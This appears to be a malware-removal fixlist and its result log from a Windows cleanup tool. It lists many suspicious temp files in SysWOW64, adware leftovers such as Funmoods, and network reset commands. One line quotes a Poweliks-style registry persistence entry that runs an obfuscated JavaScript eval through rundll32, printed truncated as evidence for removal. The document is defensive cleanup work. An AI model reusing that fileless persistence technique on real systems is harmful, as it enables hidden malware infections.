2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00026393.tmp
2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00031371.tmp
2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00020726.tmp
2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00020389.tmp
2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00017818.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00031411.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00029171.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00025329.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00017058.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00014895.tmp
2014-11-29 11:22 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00011232.tmp
2014-11-29 11:22 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00002098.tmp
2014-11-29 11:21 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00032327.tmp
2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00032523.tmp
2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00014946.tmp
2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00010308.tmp
2014-11-29 11:20 - 2014-11-29 11:20 - 01176168 ____T () C:\windows\SysWOW64\00003015.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 40034920 ____T () C:\windows\SysWOW64\00002113.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00023823.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00023071.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00014825.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00010889.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00010756.tmp
2014-11-28 19:09 - 2014-11-28 19:09 - 01176168 ____T () C:\windows\SysWOW64\00018636.tmp
2014-11-28 19:09 - 2014-11-28 19:09 - 01176168 ____T () C:\windows\SysWOW64\00009161.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00030454.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00030447.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00028745.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00028716.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00026816.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00026777.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00024578.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00023986.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00023973.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00016512.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00015573.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00015155.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00005021.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00002866.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00031673.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00030319.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00024078.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00023996.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00010089.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00009930.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00002306.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00031115.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00029658.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00025608.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00024626.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00023762.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00022929.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00021311.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00016541.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00016118.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00014977.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00014643.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00012646.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00010697.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00002161.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00002082.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00032439.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00031960.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00031865.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00026308.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00025184.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00023329.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00016944.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00011840.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00004966.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00002237.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 40034920 ____T () C:\windows\SysWOW64\00031322.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 40034920 ____T () C:\windows\SysWOW64\00023811.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00031705.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00030925.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00030333.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00029577.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00029464.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00028973.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00026798.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025951.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025547.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025444.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024393.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024370.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024084.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00023805.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00023491.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00020799.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00017673.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00017555.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00016571.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015890.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015350.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015141.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015006.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00014883.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00014818.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00012859.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00012623.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010496.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010309.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010053.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00009413.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00003548.tmp
2014-11-28 19:03 - 2014-11-28 19:03 - 40034920 ____T () C:\windows\SysWOW64\00015984.tmp
2014-11-28 18:51 - 2014-11-28 18:51 - 40034920 ____T () C:\windows\SysWOW64\00026299.tmp
2014-11-28 18:51 - 2014-11-28 18:51 - 40034920 ____T () C:\windows\SysWOW64\00017035.tmp
2014-11-28 18:51 - 2014-11-28 18:51 - 01176168 ____T () C:\windows\SysWOW64\00011277.tmp
2014-11-28 18:51 - 2014-11-28 18:51 - 01176168 ____T () C:\windows\SysWOW64\00009894.tmp
2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00025667.tmp
2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00017619.tmp
2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00015674.tmp
2014-11-28 18:49 - 2014-11-28 18:49 - 40034920 ____T () C:\windows\SysWOW64\00009558.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 40034920 ____T () C:\windows\SysWOW64\00029666.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 40034920 ____T () C:\windows\SysWOW64\00020219.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00032474.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00032274.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00031833.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00031762.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00030039.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00028825.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020776.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020697.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020695.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00017098.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016156.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016039.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016021.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00015665.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00015633.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00011924.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00008712.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00003225.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00030809.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00030106.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00024466.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00023278.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00015279.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00009040.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00008942.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00001842.tmp
2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00030623.tmp
2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00018317.tmp
2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00012316.tmp
2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00003035.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00032391.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00029358.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00025850.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00024464.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00023281.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00021293.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00017421.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00015724.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00014771.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00012382.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00012296.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011942.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011811.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011478.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00009741.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00008723.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00002995.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00001869.tmp
2014-11-28 17:41 - 2014-11-28 17:41 - 40034920 ____T () C:\windows\SysWOW64\00026500.tmp
2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00018266.tmp
2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00016034.tmp
2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00015634.tmp
2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00002285.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00030578.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00030229.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00023977.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00020742.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00020235.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00010628.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00009513.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00030861.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00026229.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00024618.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00015427.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011764.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011583.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011416.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00009629.tmp
2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00024044.tmp
2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00010878.tmp
2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00004843.tmp
2014-11-21 19:24 - 2014-11-21 19:24 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\UpdaterEX
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00032443.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00029794.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00023882.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00020540.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00016943.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00008696.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00032387.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030762.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030524.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030400.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029911.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029532.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029136.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00026392.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00025130.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00024350.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00020723.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00018485.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00018399.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00016036.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00004936.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00003093.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00002479.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00032336.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00026404.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00017573.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00015873.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003273.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003145.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003124.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00032536.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00032139.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00031035.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030934.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030827.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030618.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030117.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00024058.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00023025.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00023002.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00021308.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00016419.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00011739.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00011697.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00010722.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00009744.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00002782.tmp
2014-11-10 16:28 - 2014-11-10 16:28 - 01176168 ____T () C:\windows\SysWOW64\00010043.tmp
CustomCLSID: HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CMD: ipconfig /flushdns
CMD: netsh winsock reset all
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
end
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => Value not found.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Value not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{EF99BD32-C1FB-11D2-892F-0090271D4F88} => Value not found.
HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9C687E47-1977-4703-A481-C8CABB96E47A}" => Key not found.
"HKCR\CLSID\{9C687E47-1977-4703-A481-C8CABB96E47A}" => Key not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A531D99C-5A22-449b-83DA-872725C6D0ED}" => Key not found.
"HKCR\CLSID\{A531D99C-5A22-449b-83DA-872725C6D0ED}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => Key not found.
"HKCR\Wow6432Node\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => Key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{EF99BD32-C1FB-11D2-892F-0090271D4F88} => Value not found.
"HKCR\Wow6432Node\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}" => Key not found.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} not found.
Chrome HomePage not detected.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fdloijijlkoblmigdofommgnheckmaki" => Key not found.
"C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx" => File/Directory not found.
"C:\Program Files (x86)\Funmoods" => File/Directory not found.
"C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59}" => File/Directory not found.
"C:\windows\SysWOW64\00023117.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015471.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031111.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028728.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026393.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031371.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020726.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020389.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017818.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031411.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029171.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025329.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017058.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014895.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011232.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002098.tmp" => File/Directory not found.
